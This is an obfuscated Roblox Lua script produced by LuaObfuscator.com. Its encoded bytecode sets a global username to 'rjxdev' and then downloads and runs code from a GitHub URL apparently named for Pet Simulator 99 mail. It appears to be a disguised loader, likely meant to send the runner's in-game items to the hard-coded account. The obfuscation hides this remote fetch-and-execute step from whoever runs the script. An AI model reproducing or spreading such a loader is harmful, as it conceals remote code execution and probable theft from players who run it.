--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=0;local v82;while true do if (v81==0) then v82=v2(v0(v30,16));if v19 then local v100=v5(v82,v19);v19=nil;return v100;else return v82;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((1 + 1)^(v32-((1 + 1) -1))))%((5 -3)^(((v33-(1 -0)) -(v32-((879 -(282 + 595)) -1))) + 1)) ;return v83-(v83%(620 -(555 + 64))) ;else local v84=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v84 + v84))>=v84) and (928 -((1851 -(1523 + 114)) + 713))) or 0 ;end end local function v21()local v34=(0 -0) + 0 ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==(1065 -(68 + 997))) then v35=v1(v16,v18,v18);v18=v18 + (1271 -(226 + 1044)) ;v34=1;end end end local function v22()local v36=117 -(32 + 85) ;local v37;local v38;while true do if (v36==(1 + (0 -0))) then return (v38 * 256) + v37 ;end if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;v36=1 -0 ;end end end local function v23()local v39=350 -(87 + 263) ;local v40;local v41;local v42;local v43;while true do if (v39==(181 -((120 -53) + 113))) then return (v43 * (12302277 + (12048049 -7573110))) + (v42 * (160901 -95365)) + (v41 * 256) + v40 ;end if (v39==(0 + 0)) then v40,v41,v42,v43=v1(v16,v18,v18 + (11 -8) );v18=v18 + 4 ;v39=953 -(802 + 150) ;end end end local function v24()local v44=v23();local v45=v23();local v46=1 + 0 + 0 ;local v47=(v20(v45,(353 + 645) -(915 + 82) ,56 -36 ) * ((440 -(145 + 293))^(19 + (898 -(261 + 624))))) + v44 ;local v48=v20(v45,27 -6 ,1517 -(998 + 488) );local v49=((v20(v45,1219 -(1069 + (209 -91)) )==1) and  -1) or (2 -1) ;if (v48==(0 -0)) then if (v47==(0 + 0)) then return v49 * (772 -(201 + 571)) ;else v48=1 + 0 ;v46=(1080 -(1020 + 60)) -0 ;end elseif (v48==(1202 + 845)) then return ((v47==(0 + 0)) and (v49 * ((792 -(368 + (1846 -(630 + 793))))/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(1041 -((33 -23) + 8)) ) * (v46 + (v47/((7 -5)^((2338 -1844) -(416 + 26))))) ;end local function v25(v50)local v51=0;local v52;local v53;while true do if (((1056 -(87 + 968)) + (4 -3))==v51) then v53={};for v92=3 -2 , #v52 do v53[v92]=v2(v1(v3(v52,v92,v92)));end v51=3;end if (v51==(9 -6)) then return v6(v53);end if (v51==0) then v52=nil;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=1748 -(760 + 987) ;end if (v51==(1914 -(1789 + 124))) then v52=v3(v16,v18,(v18 + v50) -((696 + 71) -(745 + 21)) );v18=v18 + v50 ;v51=1 + 1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v54~=1) then else local v87=0 -0 ;local v88;while true do if (v87~=(1665 -(970 + 695))) then else v88=0 -0 ;while true do if (v88==2) then v54=1992 -(582 + 1408) ;break;end if (v88==(3 -2)) then for v112=1 -0 ,v59 do local v113=0 -0 ;local v114;local v115;local v116;while true do if (v113~=1) then else v116=nil;while true do if (v114~=(1824 -(1195 + 629))) then else v115=v21();v116=nil;v114=1 -0 ;end if (v114~=1) then else if (v115==1) then v116=v21()~=0 ;elseif (v115==2) then v116=v24();elseif (v115==(244 -(187 + 54))) then v116=v25();end v60[v112]=v116;break;end end break;end if (v113==0) then v114=0;v115=nil;v113=1;end end end v58[3]=v21();v88=782 -(162 + 618) ;end if (v88==(0 + 0)) then v59=v23();v60={};v88=1 + 0 ;end end break;end end end if (v54==(3 -1)) then local v89=0;while true do if (v89==0) then for v101=1,v23() do local v102=0;local v103;local v104;local v105;local v106;while true do if (v102==(1 -0)) then v105=nil;v106=nil;v102=1 + 1 ;end if (v102~=0) then else v103=0;v104=nil;v102=1;end if (v102~=2) then else while true do if (v103==0) then v104=1636 -(1373 + 263) ;v105=nil;v103=1;end if (v103==(1001 -(451 + 549))) then v106=nil;while true do if ((0 + 0)==v104) then local v158=0 -0 ;while true do if (0~=v158) then else v105=0 -0 ;v106=nil;v158=1385 -(746 + 638) ;end if ((1 + 0)==v158) then v104=1 -0 ;break;end end end if (v104~=(342 -(218 + 123))) then else while true do if (v105~=0) then else v106=v21();if (v20(v106,1582 -(1535 + 46) ,1 + 0 )==0) then local v166=0;local v167;local v168;local v169;local v170;local v171;while true do if (v166~=1) then else v169=nil;v170=nil;v166=2;end if (v166==0) then v167=0 + 0 ;v168=nil;v166=1;end if (v166~=2) then else v171=nil;while true do if (v167==2) then while true do if (v168~=(561 -(306 + 254))) then else v171={v22(),v22(),nil,nil};if (v169==(0 + 0)) then local v178=0;local v179;while true do if (v178==0) then v179=0;while true do if (v179==0) then v171[3]=v22();v171[7 -3 ]=v22();break;end end break;end end elseif (v169==1) then v171[1470 -(899 + 568) ]=v23();elseif (v169==(2 + 0)) then v171[7 -4 ]=v23() -((605 -(268 + 335))^16) ;elseif (v169==(293 -(60 + 230))) then local v190=572 -(426 + 146) ;local v191;while true do if (v190==(0 + 0)) then v191=1456 -(282 + 1174) ;while true do if (v191==0) then v171[814 -(569 + 242) ]=v23() -((5 -3)^16) ;v171[1 + 3 ]=v22();break;end end break;end end end v168=2;end if (2==v168) then local v174=1024 -(706 + 318) ;while true do if (v174==(1251 -(721 + 530))) then if (v20(v170,1,1)==(1272 -(945 + 326))) then v171[2]=v60[v171[2]];end if (v20(v170,2,2)==(2 -1)) then v171[3 + 0 ]=v60[v171[3]];end v174=1;end if (v174~=1) then else v168=703 -(271 + 429) ;break;end end end if ((3 + 0)==v168) then if (v20(v170,1503 -(1408 + 92) ,3)==1) then v171[4]=v60[v171[4]];end v55[v101]=v171;break;end if (v168==(1086 -(461 + 625))) then local v176=0;local v177;while true do if (0~=v176) then else v177=1288 -(993 + 295) ;while true do if (v177~=(1 + 0)) then else v168=1;break;end if (v177==(1171 -(418 + 753))) then v169=v20(v106,1 + 1 ,1 + 2 );v170=v20(v106,2 + 2 ,2 + 4 );v177=1;end end break;end end end end break;end if ((529 -(406 + 123))~=v167) then else local v172=0;while true do if (v172==(1769 -(1749 + 20))) then v168=0;v169=nil;v172=1 + 0 ;end if (v172~=1) then else v167=1;break;end end end if (v167==(1323 -(1249 + 73))) then local v173=0 + 0 ;while true do if (v173~=0) then else v170=nil;v171=nil;v173=1146 -(466 + 679) ;end if (v173==1) then v167=2;break;end end end end break;end end end break;end end break;end end break;end end break;end end end for v107=2 -1 ,v23() do v56[v107-(2 -1) ]=v28();end v89=1;end if (v89==(1901 -(106 + 1794))) then return v58;end end end if (v54==0) then local v90=0;local v91;while true do if (v90==0) then v91=0 + 0 ;while true do if (v91==1) then local v110=0 + 0 ;while true do if (v110==(2 -1)) then v91=2;break;end if (v110~=(0 -0)) then else v57={};v58={v55,v56,nil,v57};v110=1;end end end if (v91==(1427 -(41 + 1386))) then local v111=0;while true do if (v111~=0) then else v55={};v56={};v111=104 -(17 + 86) ;end if ((1 + 0)==v111) then v91=1 -0 ;break;end end end if ((5 -3)==v91) then v54=1;break;end end break;end end end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v86=0;while true do if (1==v86) then if (v80<=9) then if (v80<=4) then if (v80<=1) then if (v80>0) then local v117=v79[2];local v118,v119=v70(v77[v117](v13(v77,v117 + 1 ,v79[3])));v72=(v119 + v117) -1 ;local v120=0;for v131=v117,v72 do v120=v120 + 1 ;v77[v131]=v118[v120];end else v63[v79[3]]=v77[v79[2]];end elseif (v80<=2) then local v123=v79[2];v77[v123]=v77[v123](v13(v77,v123 + 1 ,v72));elseif (v80>3) then local v134=v79[2];local v135=v77[v79[3]];v77[v134 + 1 ]=v135;v77[v134]=v135[v79[4]];else v77[v79[2]]();end elseif (v80<=6) then if (v80==5) then v77[v79[2]]();else v71=v79[3];end elseif (v80<=7) then v71=v79[3];elseif (v80==8) then local v139=v79[2];local v140,v141=v70(v77[v139](v13(v77,v139 + 1 ,v79[3])));v72=(v141 + v139) -1 ;local v142=0;for v159=v139,v72 do local v160=0;while true do if (v160==0) then v142=v142 + 1 ;v77[v159]=v140[v142];break;end end end else do return;end end elseif (v80<=14) then if (v80<=11) then if (v80>10) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else v77[v79[2]]=v79[3];end elseif (v80<=12) then do return;end elseif (v80>13) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end else v63[v79[3]]=v77[v79[2]];end elseif (v80<=16) then if (v80>15) then v77[v79[2]]=v79[3];elseif (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end elseif (v80<=17) then if ((v79[3]=="_ENV") or (v79[3]=="getfenv")) then v77[v79[2]]=v63;else v77[v79[2]]=v63[v79[3]];end elseif (v80==18) then local v150=v79[2];local v151=v77[v79[3]];v77[v150 + 1 ]=v151;v77[v150]=v151[v79[4]];else local v155=v79[2];v77[v155]=v77[v155](v13(v77,v155 + 1 ,v72));end v71=v71 + 1 ;break;end if (0==v86) then v79=v67[v71];v80=v79[1];v86=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D6503063O00726A78646576030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O0012103O00013O00260B3O0001000100010004063O00010001001210000100033O00122O000100023O00120E000100043O00120E000200053O002012000200020006001210000400074O0008000200044O000200013O00022O00050001000100010004063O000E00010004063O000100012O000C3O00017O00",v9(),...);
